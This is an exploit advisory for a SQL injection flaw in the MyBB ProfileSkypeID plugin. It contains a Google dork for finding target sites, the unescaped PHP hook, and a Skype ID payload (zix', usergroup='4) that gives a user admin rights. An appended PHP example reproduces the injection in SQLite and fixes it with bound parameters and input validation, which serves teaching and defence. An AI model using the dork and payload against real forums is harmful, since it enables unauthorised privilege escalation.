# Exploit Title:
# Google Dork: intext:"Skype ID Skype ID:" inurl:member
# Date: 12.20.2012
# Exploit Author: Zixem
# Software Link: http://mods.mybb.com/view/user-profile-skype-id
# Version: 1.0
# Tested on: Linux.
----------------------------------------------
The ProfileSkypeID plugin suffers from SQL injection in an UPDATE query.
The vulnerability exists within profileskype.php, which is located in the /inc/plugins/ folder.
<?php
$plugins->add_hook("datahandler_user_update", "profileskype_update"); /*Line 15*/

function profileskype_update($skype) /*Line 167*/
{
    global $mybb;

    if (isset($mybb->input['skype']))
    {
        // Request value is copied into the UPDATE data without escaping.
        $skype->user_update_data['skype'] = $mybb->input['skype'];
    }
}
?>
How to exploit:
(1) Go to usercp.php?action=profile
(2) Insert the following string as your Skype ID: zix', usergroup='4
(3) Have some fun, you're an admin.
Proof of concept:
(1) Writing the injection: http://i.imgur.com/hg3FW.png
(2) Updating the profile and waiting a few seconds: http://i.imgur.com/fkwdi.png
(3) You're an admin: http://i.imgur.com/JIkRX.png
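The unescaped assignment above next to its fix, as an added example that is not code from the plugin or from MyBB: a constructed in-memory SQLite table stands in for the users table and receives the Skype ID string from step (2), first through quoted concatenation, then through a bound parameter, followed by a format check. The table layout, helper names and the Skype ID format rule are assumptions; inside the plugin itself the corresponding fix is to pass the value through MyBB's `$db->escape_string()` before assigning it.

```php
<?php
// Added example. Requires the pdo_sqlite extension.
// Constructed data: an in-memory table standing in for the forum's users
// table, with uid 1 starting in usergroup 2.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (uid INTEGER PRIMARY KEY, usergroup INTEGER, skype TEXT)');

function reset_user(PDO $pdo): void
{
    $pdo->exec('DELETE FROM users');
    $pdo->exec("INSERT INTO users (uid, usergroup, skype) VALUES (1, 2, '')");
}

function fetch_user(PDO $pdo): array
{
    return $pdo->query('SELECT usergroup, skype FROM users WHERE uid = 1')
               ->fetch(PDO::FETCH_ASSOC);
}

// Assumed format rule (not taken from the plugin): 6-32 characters,
// starting with a letter, then letters, digits, '.', ',', '-' or '_'.
function is_valid_skype_id(string $value): bool
{
    return preg_match('/^[A-Za-z][A-Za-z0-9.,_-]{5,31}$/', $value) === 1;
}

$input = "zix', usergroup='4"; // the Skype ID value from step (2)

// Before: the value is only wrapped in quotes, as when the hook copies
// $mybb->input['skype'] into the update array unescaped. The quote in the
// input closes the string, so the rest is parsed as a second assignment.
reset_user($pdo);
$pdo->exec("UPDATE users SET skype='{$input}' WHERE uid=1");
print_r(fetch_user($pdo));

// After, layer 1: the value is bound as a parameter, so the quote is data
// and only the skype column can change.
reset_user($pdo);
$stmt = $pdo->prepare('UPDATE users SET skype = :skype WHERE uid = 1');
$stmt->execute([':skype' => $input]);
print_r(fetch_user($pdo));

// After, layer 2: refuse values that are not shaped like a Skype ID at all.
var_dump(is_valid_skype_id($input));
var_dump(is_valid_skype_id('zixem.demo')); // constructed well-formed ID
```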
----------------------------------------------
[*] Follow for more: http://twitter.com/z1xem
[*] http://zixem.altervista.org/
[*] http://zentrixplus.net/